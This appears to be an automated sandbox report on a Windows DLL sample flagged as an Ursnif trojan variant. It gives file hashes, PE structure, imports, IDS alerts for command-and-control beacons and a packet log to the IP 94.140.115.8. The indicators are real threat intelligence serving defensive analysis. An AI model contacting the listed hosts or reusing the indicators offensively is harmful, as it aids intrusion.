SHA1: | 5A0AC7FD81E2F8CDF625709537454AFD7C1F6C7B |
SHA-256: | 3635478A4D062AF857A8566DD85AB46EE9253177E6445DAFE0FDFF127F49D709 |
SHA-512: | 0ABE540517605E74DF22CBF3795FC4D9B484B8BE309B85BA1BFF1576391CF994BF5CD860B32F6031C3E8484443413FB37B298D00DC5BCD8B10DCC73C7FC92A5C |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 403 |
Entropy (8bit): | 5.058106976759534 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJiWmMRSR7a1nQTsyBSRa+rVSSRnA/fpM+y:V/DTLDfuQWMBDw9rV5nA/3y |
MD5: | 99BD08BC1F0AEA085539BBC7D61FA79D |
SHA1: | F2CA39B111C367D147609FCD6C811837BE2CE9F3 |
SHA-256: | 8DFF0B4F90286A240BECA27EDFC97DCB785B73B8762D3EAE7C540838BC23A3E9 |
SHA-512: | E27A0BF1E73207800F410BA9399F1807FBA940F82260831E43C8F0A8B8BFA668616D63B53755526236433396AF4EF21E1EB0DFA9E92A0F34DB8A14C292660396 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.274033501792091 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23f2zxs7+AEszIwkn23fL:p37Lvkmb6KRfOWZEifD |
MD5: | AC0706D981AAFBBEAB5D159A0606FD69 |
SHA1: | C21C570B756DF393048921EDA77C8BD3D67B2E84 |
SHA-256: | 33A657560271FCC02DCBAB9CE1B64DCDDB1668571DFDA4BDE24BFA65265F6303 |
SHA-512: | 6FC248335C3D231DC30EB7A484697A565620AF3C503301174B00BFEAEF298CA59DFE44FFBE218D99AC512DAAC0ECE00766DB096234E7CEF8BBB8D22D113F2BA8 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.620004385389585 |
Encrypted: | false |
SSDEEP: | 24:etGSA8OmU0t3lm85xWAseO4zsQ64pfUPtkZf1fAVUWI+ycuZhNJakSXPNnq:66XQ3r5xNOzQfUuJ1f431ulJa3Fq |
MD5: | 0A77B73B308307CA80178B91A6ADB373 |
SHA1: | 77ECF476524ED9C50F0A3407AFD1C567CB9575E9 |
SHA-256: | 3AFE47D5D1AA26A1A72D9D41295AB4D0F6418F2A9EF7F242DFF30B222E465670 |
SHA-512: | D6D399E42758518F135D90C8B54E574EE78154B34EF8BBE4C1E4DAD582B92460E343F335B66FEB6338F708FBB14F7A9437DD0324928D9EA153926BD1E9958167 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.354685799707944 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRfPEifiKaM5DqBVKVrdFAMBJTH:Akka6CPEuiKxDcVKdBJj |
MD5: | B1542326ED57702090D125AF64F2C458 |
SHA1: | 599EC5D66F76B4EF2A049D6FCFC4A3C12FC889B9 |
SHA-256: | 4E39D256644F4E4034CADD2599F89BEC1FB13DC3CCE6C57AEEE0C95A54196409 |
SHA-512: | E723D31CCEB781CD77CB0BA3170760E37B541DEF4B7756C7C7447A4D37722AF5C0B6A353BB1E22E7D322D1C5539DCE9A1977480121D0F0A3F8CC0F14D580EEB2 |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 652 |
Entropy (8bit): | 3.079770810918438 |
Encrypted: | false |
SSDEEP: | 12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grynak7YnqqjPN5Dlq5J:+RI+ycuZhNFakSjPNnqX |
MD5: | 49500D4CE94E9FDBED89D7BD8B1B61CE |
SHA1: | BB950690E95DB3D2BD465D0CBA1C6E3DB840113A |
SHA-256: | E633211CABB9254E3534A63C5F7F8AB979674BC04E6A15F5C87ABD4AE6B68F9F |
SHA-512: | 4B9EF8040E0EA72981D3E7E4D4FD7FA515F8DFDE2304E58D2DA028F157857B590DFF106338275969A556C256E9604296827CAD0312450497CBE9F74765C24847 |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 392 |
Entropy (8bit): | 4.988829579018284 |
Encrypted: | false |
SSDEEP: | 6:V/DsYLDS81zuJ6VMRSRa+eNMjSSRr92B7SSRNAtwy:V/DTLDfuk9eg5r9yeqy |
MD5: | 80545CB568082AB66554E902D9291782 |
SHA1: | D013E59DC494D017F0E790D63CEB397583DCB36B |
SHA-256: | E15CA20CFE5DE71D6F625F76D311E84240665DD77175203A6E2D180B43926E6C |
SHA-512: | C5713126B0CB060EDF4501FE37A876DAFEDF064D9A9DCCD0BD435143DAB7D209EFBC112444334627FF5706386FB2149055030FCA01BA9785C33AC68E268B918D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 369 |
Entropy (8bit): | 5.204819009968354 |
Encrypted: | false |
SSDEEP: | 6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2wkn23foCFqzxs7+AEszIwkn23foCFP:p37Lvkmb6KRftUWZEiftR |
MD5: | 160910514166C81D1D40C8920B01A46A |
SHA1: | 3E32407C4BED09BC17BE31DDADA342D9C2312661 |
SHA-256: | 7BF351FAEA9FE7A2F007F9EC7FE62E6F42FCBC597586709D4C28C341220EA3CD |
SHA-512: | 1BC303B9224368AB07725E891E1A45C227AC5BDC998CBA93C73BE43035E7623B9B126876F33A53B140A35E5678FD504461514146B455B6974B1E80A47F76F57F |
Malicious: | false |
Preview: |
Process: | C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 3584 |
Entropy (8bit): | 2.588749209549368 |
Encrypted: | false |
SSDEEP: | 24:etGSgE/u2Bg85z7xlfwZD6vFgdWqtkZfoq/PWI+ycuZhNFakSjPNnq:6WYb5hFCD6vQWdJoqW1ulFa3Jq |
MD5: | 4BF37FD3F1893298DD04D902FF42CB3C |
SHA1: | F32FDE1A15FB3AA788CB92B323E0358E60D2130D |
SHA-256: | 34E3240AD8DDD2C5CCB04C8240DF70FB9A138084134AD61D0586E3CA72467B0D |
SHA-512: | 1E965509C738B58EFBF8574F3D9F9907DA7A683D8ED6902481F6BD74DD87CFD0A9E94F7DDD0CCFE39437286A54FDAC8CD60764D5B54EB7289CB4D0AB29E1D13D |
Malicious: | false |
Preview: |
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | modified |
Size (bytes): | 866 |
Entropy (8bit): | 5.323364450020492 |
Encrypted: | false |
SSDEEP: | 24:AId3ka6KRf3Eif6KaM5DqBVKVrdFAMBJTH:Akka6C3Eu6KxDcVKdBJj |
MD5: | 7CB77F9CD9B961C5FA10DC8E382363B5 |
SHA1: | 87B2639DFD176D5E3C6EECADCAF41EBE5655016E |
SHA-256: | 833D763ABB5539AB25BBDEB836035EA6675EC58FE3CFAFD3783A3CCC9FCF4641 |
SHA-512: | C9769A8C51B9D1644BAE7170EFDC7243499D3D0606F2029E78C6E252E1B5B2BB603E647CEAB86FE2B8657E72D68100D296F1BEE6927361D3A27A0E641D064097 |
Malicious: | false |
Preview: |
C:\Users\user\Documents\20220428\PowerShell_transcript.609290.5b3sR3N3.20220428153620.txt
Process: | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
File Type: | |
Category: | dropped |
Size (bytes): | 1355 |
Entropy (8bit): | 5.38313824612596 |
Encrypted: | false |
SSDEEP: | 24:BxSAR7vBZJsx2DOXUWS5o+LCH1r4qWMHjeTKKjX4CIym1ZJXu5o+LCH1r4JnxSAO:BZNvjOoOy5oh1r4tMqDYB1ZY5oh1r4NY |
MD5: | 23065A2E9223FC9CEAE89DD35C355A2D |
SHA1: | 6F6E50249A7DC923FEF89EE6CBD4D1D7C7139750 |
SHA-256: | 511CF786FA26019498C2542D4CB3954694D9406468A6875A04172D4CE05D1C9A |
SHA-512: | 8C0B98F86DC6D00E16785EBD3FAE84BEC1DDA1B3C2F26AC3778EBA2C92E84611E5B3E82DE828F270B9439618B7EB1135425587D83E033AA889CABB1E11E93E2D |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 6.102085694749143 |
TrID: |
|
File name: | 626a961800203.dll |
File size: | 618496 |
MD5: | d6c8aff647ab919e9bc6f2c8aeb125c7 |
SHA1: | f71c3d08ba85869cb45cb611c3ef9da8f5736b70 |
SHA256: | de5d66f93a36ef1db41b9b53913296c0ff2828d0b07baff68154fc54683ac45c |
SHA512: | 060d12d327494cacdf42379abc7448087c1b2af5df6c7a417a02a8e1119dff394420ffa3259dbe2fb90f84bf337ce1ce9c6c02fea672a31249edd47144ba80be |
SSDEEP: | 6144:eBbkmU1vOuplJSdX8vxxaYuQ1n79lmdrjhXccbwD1Yl/R0odd6MbBCKaDhabuFGs:iUJVpXScgQ1n7DQjbES/OodJ+KS |
TLSH: | 62D4E029C7501A6AD81537791899803F0A39F978E32F70EF26847D6FB50A6F05A34F39 |
File Content Preview: | MZ......................@...................................,...........!..L.!This program cannot be run in DOS mode....$........I.R.(n..(n..(n......(n..z...(n..P...(n.fLj..(n..vl..(n..z...(n..P...(n.._...(n..z...(n..z...(n......(n.fLk..(n..z...(n..z...(n |
Icon Hash: | 9068eccc64f6e2ad |
Entrypoint: | 0x401023 |
Entrypoint Section: | .text |
Digitally signed: | false |
Imagebase: | 0x400000 |
Subsystem: | windows gui |
Image File Characteristics: | 32BIT_MACHINE, EXECUTABLE_IMAGE, DLL |
DLL Characteristics: | TERMINAL_SERVER_AWARE |
Time Stamp: | 0x411096D1 [Wed Aug 4 07:57:05 2004 UTC] |
TLS Callbacks: | |
CLR (.Net) Version: | |
OS Version Major: | 5 |
OS Version Minor: | 0 |
File Version Major: | 5 |
File Version Minor: | 0 |
Subsystem Version Major: | 5 |
Subsystem Version Minor: | 0 |
Import Hash: | de44747c447d17324a209c20a63c5698 |
Programming Language: |
|
Name | Virtual Address | Virtual Size | Is in Section |
---|---|---|---|
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0x8a000 | 0xa0 | .idata |
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x8b000 | 0xc100 | .rsrc |
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x98000 | 0x1010 | .reloc |
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x40000 | 0x38 | .rdata |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_IAT | 0x8a2ac | 0x20c | .idata |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x1000 | 0x1 | .text |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 | |
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics |
---|---|---|---|---|---|---|---|---|
.text | 0x1000 | 0x3efe0 | 0x3f000 | False | 0.375902932788 | data | 4.4597296346 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ |
.rdata | 0x40000 | 0x3fb5f | 0x40000 | False | 0.815296173096 | data | 7.22909930069 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.data | 0x80000 | 0x9537 | 0x7000 | False | 0.327043805804 | data | 5.46899156125 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.idata | 0x8a000 | 0x98d | 0x1000 | False | 0.2060546875 | data | 2.48883672307 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ |
.rsrc | 0x8b000 | 0xc100 | 0xd000 | False | 0.465106670673 | data | 5.38059585556 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ |
.reloc | 0x98000 | 0x17d7 | 0x2000 | False | 0.237915039062 | data | 3.90488138375 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ |
Name | RVA | Size | Type | Language | Country |
---|---|---|---|---|---|
RT_BITMAP | 0x8b510 | 0x666 | data | English | United States |
RT_ICON | 0x8bb78 | 0x485d | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States |
RT_ICON | 0x903d8 | 0x25a8 | dBase IV DBT of `.DBF, block length 9216, next free block index 40, next free block 331218944, next used block 4106092544 | English | United States |
RT_ICON | 0x92980 | 0xea8 | data | English | United States |
RT_ICON | 0x93828 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | English | United States |
RT_ICON | 0x940d0 | 0x568 | GLS_BINARY_LSB_FIRST | English | United States |
RT_DIALOG | 0x94638 | 0xb4 | data | English | United States |
RT_DIALOG | 0x946f0 | 0x120 | data | English | United States |
RT_DIALOG | 0x94810 | 0x158 | data | English | United States |
RT_DIALOG | 0x94968 | 0x202 | data | English | United States |
RT_DIALOG | 0x94b70 | 0xf8 | data | English | United States |
RT_DIALOG | 0x94c68 | 0xa0 | data | English | United States |
RT_DIALOG | 0x94d08 | 0xee | data | English | United States |
RT_GROUP_ICON | 0x94df8 | 0x4c | data | English | United States |
RT_VERSION | 0x94e48 | 0x290 | MS Windows COFF PA-RISC object file | English | United States |
DLL | Import |
---|---|
msvcrt.dll | fgetwc, strcoll, srand |
GDI32.dll | GetBkColor, ExtSelectClipRgn, GetTextMetricsW, GetCharWidthFloatA, GetCharWidth32A, GetTextCharacterExtra, GetCharWidthA, GdiComment |
KERNEL32.dll | GetStringTypeA, WriteProcessMemory, GetCommTimeouts, GetConsoleCP, EnumResourceTypesA, GlobalFlags, GetFileTime, GetThreadLocale, LocalHandle, GetLargestConsoleWindowSize, EraseTape, GetDiskFreeSpaceExA, lstrlenA, GlobalMemoryStatus, GetModuleFileNameA, GetBinaryTypeA, DebugBreak |
ADVAPI32.dll | RegGetValueA, GetFileSecurityA, EnumServicesStatusExW, InitiateSystemShutdownExW |
mscms.dll | GetColorDirectoryW |
USER32.dll | GetClientRect, GetClassNameA, GetPropW, GetScrollBarInfo, DeleteMenu, MessageBoxIndirectW, GetMenuItemRect, GetMessagePos, DefMDIChildProcW, GetUpdateRgn, LoadMenuA, GetQueueStatus, GetMessageW |
OLEAUT32.dll | LoadTypeLibEx, GetRecordInfoFromTypeInfo |
Description | Data |
---|---|
LegalCopyright | A Company. All rights reserved. |
InternalName | |
FileVersion | 1.0.0.0 |
CompanyName | A Company |
ProductName | |
ProductVersion | 1.0.0.0 |
FileDescription | |
OriginalFilename | myfile.exe |
Translation | 0x0409 0x04b0 |
Language of compilation system | Country where language is spoken | Map |
---|---|---|
English | United States |
Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|---|---|---|
04/28/22-15:36:09.408600 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
04/28/22-15:36:11.602821 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
04/28/22-15:35:48.541659 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49760 | 80 | 192.168.2.4 | 13.107.42.16 |
04/28/22-15:36:10.453628 | TCP | 2033203 | ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B) | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Apr 28, 2022 15:36:11.134828091 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134845018 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.134865999 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.134892941 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.147710085 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.147798061 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.147840977 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.147870064 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.147967100 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.148016930 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188642979 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188699961 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188740969 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188780069 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188819885 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188829899 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188858986 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188867092 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188874006 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188879013 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188890934 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188921928 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188930988 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.188955069 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.188970089 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.189009905 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.189034939 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.189038038 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.189069986 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.189100027 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.199100971 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.199151039 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.199198961 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.199227095 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.199297905 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.199338913 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235191107 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235253096 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235297918 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235337019 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235346079 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235377073 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235382080 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235399008 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235414028 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235443115 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235470057 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235482931 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235490084 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235522985 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235532045 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235563040 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235573053 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235590935 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235613108 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235630035 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235651016 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235671043 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235685110 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235711098 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235718966 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235738993 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.235763073 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.235781908 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.243061066 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.243117094 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.243160963 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.243189096 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.243211985 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.243331909 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275296926 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275352955 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275394917 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275435925 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275450945 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275476933 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275518894 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275523901 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275533915 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275547981 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275594950 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275614977 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275649071 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275686979 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275727034 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275753975 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275768995 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275803089 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275806904 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275846958 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275850058 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275876045 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.275883913 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275916100 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.275944948 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333287001 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333345890 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333386898 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333429098 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333427906 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333467960 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333472013 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333473921 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333508968 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333525896 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333539963 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333579063 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333586931 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333616972 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333625078 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333656073 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333661079 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333683014 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333700895 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333746910 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333889961 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333930969 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
Apr 28, 2022 15:36:11.333947897 CEST | 49763 | 80 | 192.168.2.4 | 94.140.115.8 |
Apr 28, 2022 15:36:11.333970070 CEST | 80 | 49763 | 94.140.115.8 | 192.168.2.4 |
